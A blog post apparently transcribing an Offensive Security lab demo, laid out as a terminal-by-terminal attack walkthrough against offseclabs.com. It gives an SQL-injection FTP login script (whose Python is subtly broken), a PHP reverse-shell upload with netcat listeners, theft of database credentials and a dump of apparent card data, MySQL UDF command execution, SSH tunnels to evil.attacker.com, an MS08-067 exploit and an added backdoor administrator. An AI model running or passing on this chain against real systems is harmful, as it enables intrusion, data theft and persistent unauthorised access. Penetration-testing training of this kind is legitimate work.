I’m Back :) : Penetration Testing in the Real World

Sorry Every1 for a big delay of 3 months 😐 i got busy with my exams and so i couldn’t give time to you all but now i have returned to field so lets get started….
Well enjoy this awesome video from Offensive Security :

ftp-brute.py

#!/usr/bin/python
from ftplib import FTP
print "Attempting user Directory Discover via FTP"
for i in range(0,6):

username=%’) and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT “+ STR(I)+”,1; —  ”
password=str(“1”)
ftp=FTP(‘www.offseclabs.com’)
ftp.login(username,password)
print “Logged in as user “+str(i)+”,1″
ftp.retrlines(‘LIST’)
ftp.close()

Commands


Open Terminal A :

nmap -p 21,80 http://www.offseclabs.com
nc -v http://www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear

ftp http://www.offseclabs.com
username – bob
password – bob
(To enumerate the ftp server)

ftp http://www.offseclabs.com
username – %’) and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; —
password – 1

(logged in to the ftp server)
pwd
ls
bye

clear

cd core
clear
nano brute.py –> (see above ftp-brute.py)
./brute.py
(get the fifth user who has mapped to the root directory of webserver)
clear

ftp http://www.offseclabs.com
username – %’) and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; —
password – 1

(logged in as the fifth user)
ls
put rs.php –> (a reverse php shell)

———————–
Open Terminal B :

nc -lvp 80

———————–
Open Terminal C :

wget http://www.offseclabs.com/rs.php

(Then, at Terminal B, we got a reverse shell)

———————–
Go back to Terminal B :
(inside the reverse shell)

/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)

mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt

————————
Open a Firefox :

http://www.offseclabs.com/images/ccdump.txt
(we got the database dump)

————————-
Go back to Terminal A :

(inside the ftp server)
put up.html –> (file upload html file)
put up.php — > (file upload php file)

————————-
Open Firefox :

http://www.offseclabs.com/up.html

(upload lib_mysqludf_sys.so and marked it as 1)
(upload rs [a binary reverse shell) and marked it as 2)

** Details of lib_mysqludf_sys.so

—————————
Go back to Terminal A :

(quit the ftp server)
bye
clear
exit
(quit Terminal A)

—————————-
Go back to Terminal B :

mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title=”1″ into dumpfile ‘/usr/lib/lib_mysqludf_sys.so’;
SELECT imgdata from binfile where title=”2″ into dumpfile ‘/tmp/db’;

CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME ‘lib_mysqludf_sys.so’;
CREATE FUNCTION sys_get RETURNS string SONAME ‘lib_mysqludf_sys.so’;
CREATE FUNCTION sys_set RETURNS int SONAME ‘lib_mysqludf_sys.so’;
CREATE FUNCTION sys_exec RETURNS int SONAME ‘lib_mysqludf_sys.so’;
CREATE FUNCTION sys_eval RETURNS string SONAME ‘lib_mysqludf_sys.so’;

SELECT sys_eval(‘chmod 755 /tmp/bd’);
SELECT sys_eval(‘/tmp/bd &’);
(don’t press Enter at this moment)

—————————
Open Terminal D :

nc -lvp 80

(go back to Terminal B and press enter, you will get reserver shell at Terminal D)

—————————-
Open Terminal E :

nc -lvp 80

—————————-
Go back to Terminal B :

(inside the MySQL server)
SELECT sys_eval(‘/tmp/bd &’);

(press enter and we got another reverse shell at Terminal E)

—————————
Go back to Terminal E :

(inside the reverse shell)
ping -c 1 10.150.0.20
clear

ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)

—————————–
Open Terminal F :

netstat antp
nmap -sS 127.0.0.1 -p445 –script smb-check-vulns.nse

—————————–
Go back to Terminal D :

ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)

clear

——————————
Go back to Terminal F :

cd core
nano nx.py –> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444

(we got a remote shell of 10.150.0.20)
ip config
net user hacker hacker /add
net localgroup administrators hacker /add

———————————
Go back to Terminal D :

(quit the tunnel)
exit
clear

ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear

———————————–
Open Terminal G :

netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1

(login to the 10.150.0.20 with username – hacker and password – hacker)

Enjoy 🙂 see ya !!

Advertisements

Join the Discussion

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Blog at WordPress.com.

Up ↑

%d bloggers like this: